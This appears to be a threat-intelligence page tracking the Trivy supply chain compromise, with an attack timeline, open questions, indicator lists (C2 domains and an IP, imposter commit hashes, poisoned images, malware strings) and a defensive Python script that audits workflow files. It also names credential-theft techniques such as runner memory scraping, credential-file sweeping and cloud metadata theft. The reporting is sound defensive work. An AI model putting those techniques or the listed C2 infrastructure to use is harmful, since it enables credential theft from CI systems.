2026-03-19 UTC
Active Investigation

Trivy Supply Chain Compromise

A coordinated attack targeting Aqua Security's Trivy ecosystem, building on the incident from early March.

Phase 01

Initial Compromise

v0.69.4 tag pushed → references imposter commits (trivy, actions/checkout) → C2 fetch (scan.aquasecurtiy.org / 45.148.10.212) → cred stealer in built artifacts
Malicious Commit Exfiltration

Imposter Commit to actions/checkout

Attacker creates a malicious commit impersonating rauchg (Guillermo Rauch) in the actions/checkout repository. Payload fetches malicious Go files from typosquatted C2 and injects them into the build.

Malicious Commit Persistence

Imposter Commit to aquasecurity/trivy

Attacker duplicates a prior legitimate contribution and impersonates DmitriyLewen. This malicious commit references the imposter checkout action, establishing the attack chain.

Tag Push Release
17:43:37 UTC

Malicious v0.69.4 Tag Pushed

Tag v0.69.4 pushed to trivy repository, pointing to the malicious commit. This triggers automated release workflows.

Distribution Supply Chain

Malicious Releases Distributed

Automated workflows publish the malicious v0.69.4 release to multiple distribution channels, maximizing supply chain impact.

Phase 02

Lateral Movement via compromised aqua-bot identity

aqua-bot compromised → malicious workflows steal creds (tfsec, trivy-action, traceeshark) → trivy-action + setup-trivy tags pointed to malicious versions
Workflow Injection Secret Dump
21:31:23 UTC

tfsec Workflow Compromised

Malicious workflow added to aquasecurity/tfsec using compromised aqua-bot identity. Workflow dumps secrets, then is reverted.

Workflow Injection Secret Dump
21:35:34 UTC

traceeshark Workflow Compromised

Same attack pattern applied to aquasecurity/traceeshark. Malicious workflow injected via compromised bot account.

Workflow Injection Secret Dump
21:36:28 UTC

trivy-action Workflow Compromised

Attack continues to aquasecurity/trivy-action. This repository is particularly critical as it's used by thousands of downstream projects.

Phase 03

Malicious Distribution

Tag Manipulation Supply Chain
22:08 UTC

Malicious Action Tags Published

Using compromised aqua-bot credentials, attacker publishes malicious tags for trivy-action and setup-trivy, potentially affecting all downstream users.

Phase 04

Obfuscation coordinated spam flood

Spam Flood 96 Accounts
00:08:33 - 00:09:00 UTC (Mar 20)

Discussion #10420 Flooded

96 spam accounts posted generic praise comments within ~30 seconds, drowning technical discussion and incident coordination. Includes troll comments referencing "sugma" and "ligma".

Thread 01

How did they gain access to push the malicious v0.69.4 tag?

The attacker was able to push a tag to aquasecurity/trivy pointing to a malicious commit. This requires write access to the repository. Was this via a compromised PAT, GitHub App, or deploy key? The initial access vector remains unclear.

Unresolved
Thread 02

Was aqua-bot the initial access vector, or only compromised via /trivy?

The aqua-bot service account was used for lateral movement to tfsec, traceeshark, and trivy-action. However, it's unclear whether aqua-bot credentials were the initial compromise, or if they were harvested from the trivy repository's secrets after the v0.69.4 tag push triggered workflows.

Unresolved
Thread 03

What was the v0.70.0 trivy attacker tag?

At 17:51:17 UTC on March 19, a v0.70.0 tag was deleted. The commit (9dbb34d3ec0f) was authored by aqua-bot on March 16 — 3 days earlier — with message "Updates", modifying cmd/trivy/main.go, pkg/github/auth.go, pkg/github/repowrite.go, pkg/github/runner.go. This suggests aqua-bot compromise may predate March 19.

View commit (via Adnan Khan)
Unresolved
Thread 04

What was the setup-trivy@v0.2.5 poisoning?

Commit 8afa9b9f was pushed to aquasecurity/setup-trivy, spoofing contributor "thara" (Tomochika Hara). Message: "Pin Trivy install script checkout to a specific commit (#28)". Spoofed date: 2026-01-15 (actual push time unknown).

Malicious commit / Victim example (grafana)
Unresolved
Thread 05

Is DarkSeek3r related?

A GitHub user "DarkSeek3r" (now deleted, user ID 266895321) was created at 2026-03-10T01:44:23. Their only public activity before account deletion was forking aquasecurity/trivy and actions/checkout — the exact repositories used in this attack.

View Gist (bored-engineer)
Unresolved
Network Infrastructure

C2 Domains & IPs

# Primary C2 (typosquat)
scan.aquasecurtiy.org
45.148.10.212 (TECHOFF SRV LIMITED, Amsterdam, NL)
# Secondary C2 (Cloudflare Tunnel)
plug-tab-protective-relay.trycloudflare.com
# Fallback C2 (ICP hosted) - currently RickRoll, actor can update
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
Malicious Commits

Imposter & Injected Commits

# Imposter commits (spoofed identities)
70379aad1a8b40919ce8b382d3cd7d0315cde1d0 actions/checkout (impersonating rauchg)
1885610c6a34811c8296416ae69f568002ef11ec aquasecurity/trivy (impersonating DmitriyLewen)
# Lateral movement commits (via aqua-bot)
a67fd5b5b119 aquasecurity/tfsec
56591dfe113b aquasecurity/traceeshark
93ed41111017c3767fafc7d9cc8711f3be1a661f aquasecurity/trivy-action
# setup-trivy poisoning (January 2026, spoofing thara)
8afa9b9f9183b4e00c46e2b82d34047e3c177bd0 aquasecurity/setup-trivy
Compromised Accounts

GitHub Accounts

# Compromised service account
aqua-bot (ID: 54269356, created 2019-08-19)
# Suspected attacker accounts (deleted/banned)
DarkSeek3r (ID: 266895321, created 2026-03-10T01:44:23)
Affected Artifacts

Poisoned Releases & Images

# Trivy v0.69.4 (removed)
ghcr.io/aquasecurity/trivy:0.69.4
docker.io/aquasec/trivy:0.69.4
public.ecr.aws/aquasecurity/trivy:0.69.4
# setup-trivy (removed)
aquasecurity/setup-trivy@v0.2.5
# trivy-action (75 of 76 tags compromised)
# Never compromised: 0.35.0 and 57a97c7e7821a5776cebc9bb87c984fa69cba8f1
# Maintainers removed all compromised tags and re-tagged clean releases
# with a v prefix (e.g., v0.35.0 instead of 0.35.0)
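Because trivy-action and setup-trivy tags were repointed during the incident (Phase 03) and the 0.69.4 images were pulled, a consumer-side audit of workflow files is the practical check. The script below is an added example written for this page, not code from the tracker or from Aqua Security; it flags the removed setup-trivy@v0.2.5 pin, any mutable (non-SHA) reference to the two actions, and any of the listed 0.69.4 image names. The sample workflow text is constructed.

```python
"""Audit GitHub Actions workflow text for references tied to the Trivy
supply chain incident: poisoned pins, mutable tags of the affected
actions, and the pulled 0.69.4 container images. Added example."""
import re

# Values taken from this page's "Affected Artifacts" panel.
AFFECTED_ACTIONS = {"aquasecurity/trivy-action", "aquasecurity/setup-trivy"}
KNOWN_BAD_REFS = {"aquasecurity/setup-trivy@v0.2.5"}
KNOWN_GOOD_SHAS = {"57a97c7e7821a5776cebc9bb87c984fa69cba8f1"}
BAD_IMAGES = {
    "ghcr.io/aquasecurity/trivy:0.69.4",
    "docker.io/aquasec/trivy:0.69.4",
    "public.ecr.aws/aquasecurity/trivy:0.69.4",
}
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w.-]+)@(\S+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text):
    """Return (line_no, severity, message) findings for one workflow file."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            repo, ref = m.group(1), m.group(2)
            if f"{repo}@{ref}" in KNOWN_BAD_REFS:
                findings.append((n, "critical", f"known poisoned pin {repo}@{ref}"))
            elif repo in AFFECTED_ACTIONS and not SHA_RE.match(ref):
                findings.append((n, "high", f"{repo} uses mutable ref {ref}; tags were repointed"))
            elif repo in AFFECTED_ACTIONS and ref not in KNOWN_GOOD_SHAS:
                findings.append((n, "info", f"{repo} SHA {ref} not in known-clean list"))
        for img in BAD_IMAGES:  # image refs can appear in run: steps or containers
            if img in line:
                findings.append((n, "critical", f"references pulled image {img}"))
    return findings


# Constructed sample: one poisoned pin, one mutable tag, one clean SHA, one bad image.
SAMPLE_WORKFLOW = """\
name: scan
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/setup-trivy@v0.2.5
      - uses: aquasecurity/trivy-action@0.28.0
      - uses: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1
      - run: docker run --rm ghcr.io/aquasecurity/trivy:0.69.4 image app:latest
"""

if __name__ == "__main__":
    for line_no, severity, msg in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {line_no} [{severity}] {msg}")
```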
Malware Signatures

Strings & Filenames

# Attribution strings
"TeamPCP Cloud stealer"
"tpcp.tar.gz" (exfil bundle)
"tpcp-docs" (fallback exfil repo / GitHub dead drop)
# Credential sweeper targets
50+ sensitive file paths
# Injected files (from C2)
cmd/trivy/main.go
cmd/trivy/scand.go
cmd/trivy/fork_unix.go
cmd/trivy/fork_windows.go
.golangci.yaml
# Target process
"Runner.Worker" (memory scraping target)
Threat Actor

TeamPCP

Also known as PCPcat, ShellForce, and DeadCatx3. Emerged as a significant threat to cloud-native infrastructure in late 2025.

Self-attribution string "TeamPCP Cloud stealer" found in the trivy-action payload links this incident to the group.

View on Wiz Threat Center
Targets

Cloud-Native Infrastructure

Docker APIs
Kubernetes clusters
GitHub Actions runners
Ray dashboards
Redis servers
CI/CD pipelines
TTPs

Common Techniques

# Initial Access
Supply chain poisoning (GitHub Actions, package registries)
Exposed service exploitation (Docker, K8s, Redis)
# Credential Harvesting
/proc/[pid]/mem memory scraping
Filesystem credential sweeping (50+ paths)
Cloud metadata service (IMDS) theft
# Exfiltration
Typosquatted domains
Cloudflare Tunnels (ephemeral C2)
GitHub dead drops (tpcp-docs repos)
ICP-hosted fallback infrastructure
# Objectives
Credential theft → lateral movement
Ransomware deployment
Cryptomining
Extortion
Source

Flare.io Analysis

"TeamPCP Cloud-Native Ransomware" — detailed analysis of the December 2025 worm-driven campaign targeting cloud infrastructure.